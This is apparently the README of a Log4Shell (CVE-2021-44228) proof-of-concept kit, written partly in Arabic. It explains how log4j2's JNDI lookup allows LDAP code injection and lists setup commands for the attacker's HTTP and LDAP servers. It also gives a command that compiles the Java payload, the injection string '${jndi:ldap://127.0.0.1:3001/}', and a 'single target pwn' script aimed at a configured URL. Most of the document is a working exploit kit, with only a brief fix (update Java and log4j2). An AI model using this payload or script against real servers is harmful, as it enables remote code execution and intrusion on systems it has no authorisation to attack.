
CVE-2021-44228
تم الإبلاغ عن هذه الثغرة الأساسية عبر [CVE-2018-3149](https://nvd.nist.gov/vuln/detail/CVE-2018-3149) وتم إصلاحها في [هذا المقال. (ملاحظات إصدار 8u121)](https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
ومع ذلك، فإن مكتبة التسجيل log4j2 الخاصة بجافا تحتوي على (JNDILookup)[CVE-2021-44228](https://github.com/apache/logging-log4j2/blob/20f9a97dbe5928c3b5077bcdd2a22ac92e941655/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/JndiLookup.java)، والتي تتيح الوصول إلى بروتوكولات مثل LDAP، مما سمح بحقن الأكواد في إصدارات جافا الأقدم.
الإصدارات المصححة من جافا يمكنها منع حقن الأكواد، لكن `JNDILookup` يرسل طلبات إلى خادم ldap، مما قد يؤدي إلى تسريب عنوان IP.
الحل هو تحديث **Java** وإصدار **log4j2**.
cd http-server && npm install && cd ../ldap-server && npm install
http-server و ldap-servercd http-server && node index.js &
cd ldap-server && node index.js
# This will generate Main.java - required to code injection .
# OSx
./java-single-compile <Main.java>
# Linux
javac <Main.java>
# You can still use log4j-client in repo for internal testing.
cd log4j-client &&\
gradle jar &&\
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar
# Or run other application, com.sun.jndi.ldap.object.trustURLCodebase=true required for code injection, otherwise it will only request to ldap server.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar <javafile.jar>
${jndi:ldap://127.0.0.1:3001/}
NODEP=`pgrep node`
for id in $NODEP; do
kill $id
done
# Single target pwn
# Edit exploit-configs.txt with url and params
cd scripts/single-pwn && python3 __main__.py
انظر الترخيص في LICENSE